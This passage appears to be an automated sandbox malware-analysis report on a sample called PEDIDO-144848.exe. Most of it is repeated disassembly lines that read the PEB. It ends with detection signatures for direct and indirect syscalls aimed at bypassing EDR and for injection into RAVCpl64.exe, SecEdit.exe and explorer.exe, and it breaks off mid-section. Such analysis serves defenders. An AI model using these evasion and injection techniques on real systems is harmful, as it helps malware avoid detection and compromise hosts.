        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C03536 mov eax, dword ptr fs:[00000030h]2_2_36C03536
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C03536 mov eax, dword ptr fs:[00000030h]2_2_36C03536
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C42539 mov eax, dword ptr fs:[00000030h]2_2_36C42539
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C332C0 mov eax, dword ptr fs:[00000030h]2_2_36C332C0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C332C0 mov eax, dword ptr fs:[00000030h]2_2_36C332C0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CD32C9 mov eax, dword ptr fs:[00000030h]2_2_36CD32C9
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C232C5 mov eax, dword ptr fs:[00000030h]2_2_36C232C5
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BFC2B0 mov ecx, dword ptr fs:[00000030h]2_2_36BFC2B0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BF92AF mov eax, dword ptr fs:[00000030h]2_2_36BF92AF
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C0A2E0 mov eax, dword ptr fs:[00000030h]2_2_36C0A2E0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C0A2E0 mov eax, dword ptr fs:[00000030h]2_2_36C0A2E0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C0A2E0 mov eax, dword ptr fs:[00000030h]2_2_36C0A2E0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C0A2E0 mov eax, dword ptr fs:[00000030h]2_2_36C0A2E0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C0A2E0 mov eax, dword ptr fs:[00000030h]2_2_36C0A2E0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C0A2E0 mov eax, dword ptr fs:[00000030h]2_2_36C0A2E0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C082E0 mov eax, dword ptr fs:[00000030h]2_2_36C082E0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C082E0 mov eax, dword ptr fs:[00000030h]2_2_36C082E0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C082E0 mov eax, dword ptr fs:[00000030h]2_2_36C082E0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C082E0 mov eax, dword ptr fs:[00000030h]2_2_36C082E0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C102F9 mov eax, dword ptr fs:[00000030h]2_2_36C102F9
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C102F9 mov eax, dword ptr fs:[00000030h]2_2_36C102F9
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C102F9 mov eax, dword ptr fs:[00000030h]2_2_36C102F9
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C102F9 mov eax, dword ptr fs:[00000030h]2_2_36C102F9
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C102F9 mov eax, dword ptr fs:[00000030h]2_2_36C102F9
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C102F9 mov eax, dword ptr fs:[00000030h]2_2_36C102F9
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C102F9 mov eax, dword ptr fs:[00000030h]2_2_36C102F9
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C102F9 mov eax, dword ptr fs:[00000030h]2_2_36C102F9
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C7E289 mov eax, dword ptr fs:[00000030h]2_2_36C7E289
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BFD2EC mov eax, dword ptr fs:[00000030h]2_2_36BFD2EC
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BFD2EC mov eax, dword ptr fs:[00000030h]2_2_36BFD2EC
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BF72E0 mov eax, dword ptr fs:[00000030h]2_2_36BF72E0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CBF2AE mov eax, dword ptr fs:[00000030h]2_2_36CBF2AE
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CC92AB mov eax, dword ptr fs:[00000030h]2_2_36CC92AB
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C242AF mov eax, dword ptr fs:[00000030h]2_2_36C242AF
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C242AF mov eax, dword ptr fs:[00000030h]2_2_36C242AF
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CDB2BC mov eax, dword ptr fs:[00000030h]2_2_36CDB2BC
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CDB2BC mov eax, dword ptr fs:[00000030h]2_2_36CDB2BC
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CDB2BC mov eax, dword ptr fs:[00000030h]2_2_36CDB2BC
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CDB2BC mov eax, dword ptr fs:[00000030h]2_2_36CDB2BC
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CC124C mov eax, dword ptr fs:[00000030h]2_2_36CC124C
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CC124C mov eax, dword ptr fs:[00000030h]2_2_36CC124C
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CC124C mov eax, dword ptr fs:[00000030h]2_2_36CC124C
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CC124C mov eax, dword ptr fs:[00000030h]2_2_36CC124C
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C2F24A mov eax, dword ptr fs:[00000030h]2_2_36C2F24A
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CBF247 mov eax, dword ptr fs:[00000030h]2_2_36CBF247
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BF821B mov eax, dword ptr fs:[00000030h]2_2_36BF821B
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C9327E mov eax, dword ptr fs:[00000030h]2_2_36C9327E
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C9327E mov eax, dword ptr fs:[00000030h]2_2_36C9327E
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C9327E mov eax, dword ptr fs:[00000030h]2_2_36C9327E
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C9327E mov eax, dword ptr fs:[00000030h]2_2_36C9327E
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C9327E mov eax, dword ptr fs:[00000030h]2_2_36C9327E
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C9327E mov eax, dword ptr fs:[00000030h]2_2_36C9327E
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CBD270 mov eax, dword ptr fs:[00000030h]2_2_36CBD270
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BFA200 mov eax, dword ptr fs:[00000030h]2_2_36BFA200
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BFB273 mov eax, dword ptr fs:[00000030h]2_2_36BFB273
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BFB273 mov eax, dword ptr fs:[00000030h]2_2_36BFB273
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BFB273 mov eax, dword ptr fs:[00000030h]2_2_36BFB273
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C8B214 mov eax, dword ptr fs:[00000030h]2_2_36C8B214
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C8B214 mov eax, dword ptr fs:[00000030h]2_2_36C8B214
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C3A22B mov eax, dword ptr fs:[00000030h]2_2_36C3A22B
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C3A22B mov eax, dword ptr fs:[00000030h]2_2_36C3A22B
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C3A22B mov eax, dword ptr fs:[00000030h]2_2_36C3A22B
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C80227 mov eax, dword ptr fs:[00000030h]2_2_36C80227
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C80227 mov eax, dword ptr fs:[00000030h]2_2_36C80227
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C80227 mov eax, dword ptr fs:[00000030h]2_2_36C80227
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C20230 mov ecx, dword ptr fs:[00000030h]2_2_36C20230
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C063CB mov eax, dword ptr fs:[00000030h]2_2_36C063CB
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C333D0 mov eax, dword ptr fs:[00000030h]2_2_36C333D0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C343D0 mov ecx, dword ptr fs:[00000030h]2_2_36C343D0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C843D5 mov eax, dword ptr fs:[00000030h]2_2_36C843D5
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C01380 mov eax, dword ptr fs:[00000030h]2_2_36C01380
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C01380 mov eax, dword ptr fs:[00000030h]2_2_36C01380
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C01380 mov eax, dword ptr fs:[00000030h]2_2_36C01380
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C01380 mov eax, dword ptr fs:[00000030h]2_2_36C01380
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C01380 mov eax, dword ptr fs:[00000030h]2_2_36C01380
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C1F380 mov eax, dword ptr fs:[00000030h]2_2_36C1F380
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C1F380 mov eax, dword ptr fs:[00000030h]2_2_36C1F380
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C1F380 mov eax, dword ptr fs:[00000030h]2_2_36C1F380
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C1F380 mov eax, dword ptr fs:[00000030h]2_2_36C1F380
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C1F380 mov eax, dword ptr fs:[00000030h]2_2_36C1F380
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C1F380 mov eax, dword ptr fs:[00000030h]2_2_36C1F380
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CBF38A mov eax, dword ptr fs:[00000030h]2_2_36CBF38A
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C2A390 mov eax, dword ptr fs:[00000030h]2_2_36C2A390
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C2A390 mov eax, dword ptr fs:[00000030h]2_2_36C2A390
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C2A390 mov eax, dword ptr fs:[00000030h]2_2_36C2A390
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C093A6 mov eax, dword ptr fs:[00000030h]2_2_36C093A6
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C093A6 mov eax, dword ptr fs:[00000030h]2_2_36C093A6
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C7C3B0 mov eax, dword ptr fs:[00000030h]2_2_36C7C3B0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BFC3C7 mov eax, dword ptr fs:[00000030h]2_2_36BFC3C7
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BFE3C0 mov eax, dword ptr fs:[00000030h]2_2_36BFE3C0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BFE3C0 mov eax, dword ptr fs:[00000030h]2_2_36BFE3C0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BFE3C0 mov eax, dword ptr fs:[00000030h]2_2_36BFE3C0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C3A350 mov eax, dword ptr fs:[00000030h]2_2_36C3A350
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BFE328 mov eax, dword ptr fs:[00000030h]2_2_36BFE328
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BFE328 mov eax, dword ptr fs:[00000030h]2_2_36BFE328
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BFE328 mov eax, dword ptr fs:[00000030h]2_2_36BFE328
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C0B360 mov eax, dword ptr fs:[00000030h]2_2_36C0B360
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C0B360 mov eax, dword ptr fs:[00000030h]2_2_36C0B360
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C0B360 mov eax, dword ptr fs:[00000030h]2_2_36C0B360
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C0B360 mov eax, dword ptr fs:[00000030h]2_2_36C0B360
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C0B360 mov eax, dword ptr fs:[00000030h]2_2_36C0B360
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C0B360 mov eax, dword ptr fs:[00000030h]2_2_36C0B360
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C3E363 mov eax, dword ptr fs:[00000030h]2_2_36C3E363
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C3E363 mov eax, dword ptr fs:[00000030h]2_2_36C3E363
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C3E363 mov eax, dword ptr fs:[00000030h]2_2_36C3E363
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C3E363 mov eax, dword ptr fs:[00000030h]2_2_36C3E363
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C3E363 mov eax, dword ptr fs:[00000030h]2_2_36C3E363
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C3E363 mov eax, dword ptr fs:[00000030h]2_2_36C3E363
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C3E363 mov eax, dword ptr fs:[00000030h]2_2_36C3E363
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C3E363 mov eax, dword ptr fs:[00000030h]2_2_36C3E363
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C7E372 mov eax, dword ptr fs:[00000030h]2_2_36C7E372
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C7E372 mov eax, dword ptr fs:[00000030h]2_2_36C7E372
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C7E372 mov eax, dword ptr fs:[00000030h]2_2_36C7E372
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C7E372 mov eax, dword ptr fs:[00000030h]2_2_36C7E372
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C2237A mov eax, dword ptr fs:[00000030h]2_2_36C2237A
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C80371 mov eax, dword ptr fs:[00000030h]2_2_36C80371
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C80371 mov eax, dword ptr fs:[00000030h]2_2_36C80371
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BF9303 mov eax, dword ptr fs:[00000030h]2_2_36BF9303
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BF9303 mov eax, dword ptr fs:[00000030h]2_2_36BF9303
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CBF30A mov eax, dword ptr fs:[00000030h]2_2_36CBF30A
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C8330C mov eax, dword ptr fs:[00000030h]2_2_36C8330C
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C8330C mov eax, dword ptr fs:[00000030h]2_2_36C8330C
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C8330C mov eax, dword ptr fs:[00000030h]2_2_36C8330C
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C8330C mov eax, dword ptr fs:[00000030h]2_2_36C8330C
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C1E310 mov eax, dword ptr fs:[00000030h]2_2_36C1E310
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C1E310 mov eax, dword ptr fs:[00000030h]2_2_36C1E310
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C1E310 mov eax, dword ptr fs:[00000030h]2_2_36C1E310
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C3631F mov eax, dword ptr fs:[00000030h]2_2_36C3631F
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C38322 mov eax, dword ptr fs:[00000030h]2_2_36C38322
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C38322 mov eax, dword ptr fs:[00000030h]2_2_36C38322
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C38322 mov eax, dword ptr fs:[00000030h]2_2_36C38322
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C2332D mov eax, dword ptr fs:[00000030h]2_2_36C2332D
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BF8347 mov eax, dword ptr fs:[00000030h]2_2_36BF8347
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BF8347 mov eax, dword ptr fs:[00000030h]2_2_36BF8347
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BF8347 mov eax, dword ptr fs:[00000030h]2_2_36BF8347
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CD3336 mov eax, dword ptr fs:[00000030h]2_2_36CD3336
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C1B0D0 mov eax, dword ptr fs:[00000030h]2_2_36C1B0D0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BFA093 mov ecx, dword ptr fs:[00000030h]2_2_36BFA093
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BFC090 mov eax, dword ptr fs:[00000030h]2_2_36BFC090
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C3D0F0 mov eax, dword ptr fs:[00000030h]2_2_36C3D0F0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C3D0F0 mov ecx, dword ptr fs:[00000030h]2_2_36C3D0F0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BF90F8 mov eax, dword ptr fs:[00000030h]2_2_36BF90F8
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BF90F8 mov eax, dword ptr fs:[00000030h]2_2_36BF90F8
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BF90F8 mov eax, dword ptr fs:[00000030h]2_2_36BF90F8
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BF90F8 mov eax, dword ptr fs:[00000030h]2_2_36BF90F8
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BFC0F6 mov eax, dword ptr fs:[00000030h]2_2_36BFC0F6
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CD4080 mov eax, dword ptr fs:[00000030h]2_2_36CD4080
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CD4080 mov eax, dword ptr fs:[00000030h]2_2_36CD4080
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CD4080 mov eax, dword ptr fs:[00000030h]2_2_36CD4080
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CD4080 mov eax, dword ptr fs:[00000030h]2_2_36CD4080
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CD4080 mov eax, dword ptr fs:[00000030h]2_2_36CD4080
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CD4080 mov eax, dword ptr fs:[00000030h]2_2_36CD4080
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CD4080 mov eax, dword ptr fs:[00000030h]2_2_36CD4080
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C400A5 mov eax, dword ptr fs:[00000030h]2_2_36C400A5
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CBB0AF mov eax, dword ptr fs:[00000030h]2_2_36CBB0AF
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BFB0D6 mov eax, dword ptr fs:[00000030h]2_2_36BFB0D6
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BFB0D6 mov eax, dword ptr fs:[00000030h]2_2_36BFB0D6
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BFB0D6 mov eax, dword ptr fs:[00000030h]2_2_36BFB0D6
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BFB0D6 mov eax, dword ptr fs:[00000030h]2_2_36BFB0D6
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CAF0A5 mov eax, dword ptr fs:[00000030h]2_2_36CAF0A5
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CAF0A5 mov eax, dword ptr fs:[00000030h]2_2_36CAF0A5
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CAF0A5 mov eax, dword ptr fs:[00000030h]2_2_36CAF0A5
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CAF0A5 mov eax, dword ptr fs:[00000030h]2_2_36CAF0A5
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CAF0A5 mov eax, dword ptr fs:[00000030h]2_2_36CAF0A5
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CAF0A5 mov eax, dword ptr fs:[00000030h]2_2_36CAF0A5
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CAF0A5 mov eax, dword ptr fs:[00000030h]2_2_36CAF0A5
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CD50B7 mov eax, dword ptr fs:[00000030h]2_2_36CD50B7
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C30044 mov eax, dword ptr fs:[00000030h]2_2_36C30044
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C01051 mov eax, dword ptr fs:[00000030h]2_2_36C01051
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C01051 mov eax, dword ptr fs:[00000030h]2_2_36C01051
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BFD02D mov eax, dword ptr fs:[00000030h]2_2_36BFD02D
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CA9060 mov eax, dword ptr fs:[00000030h]2_2_36CA9060
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C07072 mov eax, dword ptr fs:[00000030h]2_2_36C07072
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C06074 mov eax, dword ptr fs:[00000030h]2_2_36C06074
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C06074 mov eax, dword ptr fs:[00000030h]2_2_36C06074
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C25004 mov eax, dword ptr fs:[00000030h]2_2_36C25004
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C25004 mov ecx, dword ptr fs:[00000030h]2_2_36C25004
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C08009 mov eax, dword ptr fs:[00000030h]2_2_36C08009
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C42010 mov ecx, dword ptr fs:[00000030h]2_2_36C42010
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C101C0 mov eax, dword ptr fs:[00000030h]2_2_36C101C0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C101C0 mov eax, dword ptr fs:[00000030h]2_2_36C101C0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C151C0 mov eax, dword ptr fs:[00000030h]2_2_36C151C0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C151C0 mov eax, dword ptr fs:[00000030h]2_2_36C151C0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C151C0 mov eax, dword ptr fs:[00000030h]2_2_36C151C0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C151C0 mov eax, dword ptr fs:[00000030h]2_2_36C151C0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CC81EE mov eax, dword ptr fs:[00000030h]2_2_36CC81EE
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CC81EE mov eax, dword ptr fs:[00000030h]2_2_36CC81EE
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C2B1E0 mov eax, dword ptr fs:[00000030h]2_2_36C2B1E0

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Found direct / indirect Syscall (likely to bypass EDR)
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtClose: Direct from: 0x7FFE69879E7F
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtProtectVirtualMemory: Direct from: 0x7FFE96E82651Jump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeNtResumeThread: Indirect: 0x36913C29Jump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeNtSetContextThread: Indirect: 0x369135E9Jump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeNtSuspendThread: Indirect: 0x36913909Jump to behavior
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDelayExecution: Direct from: 0x5A127AEJump to behavior
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtAllocateVirtualMemory: Direct from: 0x7FFE7A795AE0Jump to behavior
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtProtectVirtualMemory: Direct from: 0x5A1A318Jump to behavior
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDelayExecution: Direct from: 0x5A125EDJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeNtQueueApcThread: Indirect: 0x3690F414Jump to behavior
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtResumeThread: Direct from: 0x5A1281FJump to behavior
        Maps a DLL or memory area into another process
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeSection loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeSection loaded: NULL target: C:\Windows\SysWOW64\SecEdit.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\SecEdit.exeSection loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: read writeJump to behavior
        Source: C:\Windows\SysWOW64\SecEdit.exeSection loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\SecEdit.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
        Modifies the context of a thread in another process (thread injection)
